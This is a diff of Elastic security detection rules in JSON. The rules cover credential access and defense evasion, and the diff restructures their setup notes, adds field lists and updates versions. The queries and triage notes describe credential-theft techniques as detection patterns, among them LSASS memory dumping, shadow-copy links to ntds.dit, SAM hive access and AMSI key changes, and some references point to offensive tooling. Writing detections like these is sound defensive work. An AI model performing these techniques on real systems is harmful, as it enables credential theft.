"keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef", + "setup": "You will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +94,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json index b36ef7b3f68b0..08b025b6c582a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_memdump.json @@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via LSASS Memory Dump", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n \n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n \n /* case of lsass crashing */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\")\n", + "note": "", + "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n\n /* case of lsass crashing */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\")\n", "references": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -52,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json index 3b0976b78c9f0..e912d2c61a98b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_lsass_access_via_snapshot.json @@ -11,14 +11,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential LSASS Memory Dump via PssCaptureSnapShot", - "note": "## Config\n\nThis is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.", + "note": "", "query": "event.category:process and event.code:10 and\n winlog.event_data.TargetImage:(\"C:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\System32\\\\lsass.exe\")\n", "references": [ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/sbousseaden/status/1280619931516747777?lang=en" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283", + "setup": "This is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +83,5 @@ }, "timestamp_override": "event.ingested", "type": "threshold", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json index f2b832d09a9cf..5a281dd4d312f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_suspicious_winreg_access_via_sebackup_priv.json @@ -11,14 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Remote Registry Access via SeBackupPrivilege", - "note": "## Config\n\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", - "query": "sequence by host.id, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Remote Registry Access via SeBackupPrivilege\n\nSeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of\nthe system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of\nproviding the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system.\n\nThis rule identifies remote access to the registry using an account with Backup Operators group membership. This may\nindicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation\nfor credential access and privileges elevation.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId`\ncan be used to get this data.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file\nmodifications, and processes created.\n- Investigate if the registry file was retrieved or exfiltrated.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions\nif necessary. \n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Limit or disable the involved user account to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "sequence by host.id, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\" and\n\n /* excluding accounts with existing privileged access */\n not winlog.event_data.PrivilegeList : \"SeDebugPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", "references": [ "https://github.com/mpgn/BackupOperatorToDA", "https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +96,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json index 7bab4403c4114..e708d6243e2d9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_symbolic_link_to_shadow_copy_created.json @@ -16,16 +16,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt\nto discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active\nDirectory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is\nneeded to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules \n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested) \n \n``` \nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nSystem Audit Policies > \nObject Access > \nAudit File System (Success,Failure) \nAudit Handle Manipulation (Success,Failure) \n``` \n \nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments. \nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule. \n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\",\"process_created\") and \n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and \n \n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt\nto discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active\nDirectory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is\nneeded to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "process where event.type in (\"start\",\"process_created\") and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", "https://www.hackingarticles.in/credential-dumping-ntds-dit/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json index c7659fab81750..dc4db164fdd6a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json @@ -15,6 +15,23 @@ "references": [ "https://github.com/AlessandroZ/LaZagne/blob/master/Mac/lazagne/softwares/system/chainbreaker.py" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d75991f2-b989-419d-b797-ac1e54ec2d61", "severity": "high", @@ -51,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json index 408a12cf85ce2..a03898f5a3656 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json @@ -15,10 +15,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Excessive Single Sign-On Logon Errors", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -52,5 +81,5 @@ "value": 5 }, "type": "threshold", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json index 7cd8ebcd77d31..409176331416e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json @@ -12,13 +12,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Okta User Session Impersonation", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.session.impersonation.initiate\n", "references": [ "https://blog.cloudflare.com/cloudflare-investigation-of-the-january-2022-okta-compromise/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "cdbebdc1-dc97-43c6-a538-f26a20c0a911", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -42,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json index 3680bcfd8c956..aed01f7918d3d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json @@ -11,14 +11,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential LSASS Clone Creation via PssCaptureSnapShot", - "note": "## Config\n\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.code:\"4688\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\"\n", "references": [ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://medium.com/@Achilles8284/the-birth-of-a-process-part-2-97c6fb9c42a2" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", + "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json index b1963b1b83666..01b0a70774f81 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"attrib.exe\" and process.args : \"+h\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -61,5 +79,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 13 + "version": 15 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json index 88dfa27a313b3..ccea306c55715 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json @@ -16,6 +16,13 @@ "license": "Elastic License v2", "name": "Agent Spoofing - Mismatched Agent ID", "query": "event.agent_id_status:agent_id_mismatch\n", + "required_fields": [ + { + "ecs": true, + "name": "event.agent_id_status", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3115bd2c-0baa-4df0-80ea-45e474b5ef93", "severity": "high", @@ -43,5 +50,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json index e74f382e2291f..54d221bcc6643 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json @@ -16,6 +16,13 @@ "license": "Elastic License v2", "name": "Agent Spoofing - Multiple Hosts Using Same Agent", "query": "event.agent_id_status:*\n", + "required_fields": [ + { + "ecs": true, + "name": "event.agent_id_status", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "493834ca-f861-414c-8602-150d5505b777", "severity": "high", @@ -55,5 +62,5 @@ }, "timestamp_override": "event.ingested", "type": "threshold", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json index f542cf2ca89f4..0e50d057040c1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of AmsiEnable Registry Key", - "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and\nservices to integrate with any antimalware product that's present on a machine. AMSI provides integration with multiple\nWindows components, ranging from User Account Control (UAC) to VBA Macros.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade\ndetections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- 